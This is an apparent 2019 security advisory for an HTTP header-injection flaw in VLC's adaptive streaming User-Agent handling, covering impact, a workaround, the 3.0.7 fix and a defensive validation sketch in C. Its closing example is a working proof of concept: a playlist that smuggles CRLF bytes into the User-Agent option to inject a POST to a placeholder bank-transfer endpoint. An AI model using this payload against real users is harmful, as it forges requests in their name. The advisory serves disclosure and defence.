VLC adaptive HTTP User-Agent injection vulnerability

Security Advisory

Summary           : Insufficient input validation
                    HTTP protocol injection vulnerability
Date              : 10 June 2019
Affected versions : vlc 3.0.6 down to 3.0.0
Impact            : Arbitrary HTTP requests
CVE ID            : unknown/unassigned
ID                : VLC Trac bug #20813

Details

For unknown reasons, the VLC media player (and the underlying LibVLC application library) uses a distinct HTTP client implementation to handle adaptive network streams such as HTTP Live Streaming (HLS).

Additionally, VLC allows specifying a custom string to use as the HTTP User-Agent header line in HTTP request headers. However, in the case of HTTP adaptive streaming, the custom string is not validated in any way. This allows a malicious network resource to provide an arbitrary byte sequence, including CRLF, and thus to inject arbitrary header lines into the normal HTTP GET request, or even complete arbitrary HTTP request headers (after the GET request).
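
The missing check, sketched as an added example (this is not code from VLC, from the 3.0.7 fix, or from the advisory author): a header value is validated before it is written into the request, and a fallback is used when it contains CR, LF or other control bytes. The names header_value_is_safe, build_get_request, count_crlf and DEFAULT_UA are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fallback used when the configured string is rejected. */
#define DEFAULT_UA "ExamplePlayer/1.0"

/* True if s can be a header field value: non-empty, and only HTAB, SP,
 * visible ASCII or obs-text (RFC 7230, 3.2). CR, LF, other C0 controls
 * and DEL are rejected. */
bool header_value_is_safe(const char *s)
{
    if (s == NULL || *s == '\0')
        return false;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++)
        if ((*p < 0x20 && *p != '\t') || *p == 0x7F)
            return false;
    return true;
}

/* Writes a GET request into buf, replacing an unsafe user agent with
 * DEFAULT_UA. Returns the length, or -1 if host or path is unsafe or
 * buf is too small. */
int build_get_request(char *buf, size_t size, const char *host,
                      const char *path, const char *ua)
{
    if (!header_value_is_safe(host) || !header_value_is_safe(path)
     || strpbrk(host, " \t") || strpbrk(path, " \t"))
        return -1;
    if (!header_value_is_safe(ua))
        ua = DEFAULT_UA;
    int n = snprintf(buf, size,
                     "GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n",
                     path, host, ua);
    return (n < 0 || (size_t)n >= size) ? -1 : n;
}

/* Counts CRLF sequences; a single GET built above always has four. */
int count_crlf(const char *req)
{
    int n = 0;
    for (const char *p = req; (p = strstr(p, "\r\n")) != NULL; p += 2)
        n++;
    return n;
}
```

Rejecting the value outright, rather than stripping the offending bytes, avoids sending a header the user never intended.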

Impact

If successful, a malicious user could use this vulnerability to craft arbitrary HTTP requests, including non-idempotent requests such as HTTP POST.

Threat mitigation

An attacker needs to trick the user into opening a crafted playlist manifest.

Workarounds

The only known work-around consists of deleting the adaptive plug-in within the VLC installation, then restarting the application.

The file is normally named libadaptive_plugin.dll, libadaptive_plugin.dylib, or libadaptive_plugin.so depending on the operating system.

Note that this will prevent playing legitimate segmented HTTP streams.

Solution

VLC media player version 3.0.7 includes a fix for this issue.

Credits

This vulnerability was discovered by Rémi Denis-Courmont, and was not sponsored.

References

VLC Trac bug #20813
https://trac.videolan.org/vlc/ticket/20813
Rémi Denis-Courmont
http://www.remlab.net/

History

10 July 2018  : Bug reported
23 April 2019 : Bug fixed
24 May 2019   : VLC 3.0.7 released
10 June 2019  : Initial advisory

Example

This sample XSPF playlist, which the user must be tricked into opening, shows how to set the HTTP User-Agent to inject an HTTP POST request:

<?xml version="1.0" encoding="UTF-8"?>
<playlist
  xmlns="http://xspf.org/ns/0/"
  xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"
  version="1">
  <title>Liste de lecture</title>
  <trackList>
    <track>
      <location>http://www.example.org/stream.m3u8</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
        <vlc:option>http-user-agent=Hacked/0&#13;&#10;&#13;&#10;POST /bank-transfer HTTP/1.1&#13;&#10;Host: account.piggy-bank.example.com&#13;&#10;Content-Length: 12&#13;&#10;&#13;&#10;Hello world!</vlc:option>
      </extension>
    </track>
  </trackList>
  <extension application="http://www.videolan.org/vlc/playlist/0">
    <vlc:item tid="0"/>
  </extension>
</playlist>

At www.example.org, the following sample manifest can be used to trigger the VLC HTTP adaptive plugin and select the target web server:

#EXTM3U
#EXT-X-PLAYLIST-TYPE:VOD
#EXT-X-TARGETDURATION:10
#EXT-X-VERSION:3
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://account.piggy-bank.example.com/segment0.ts
#EXT-X-ENDLIST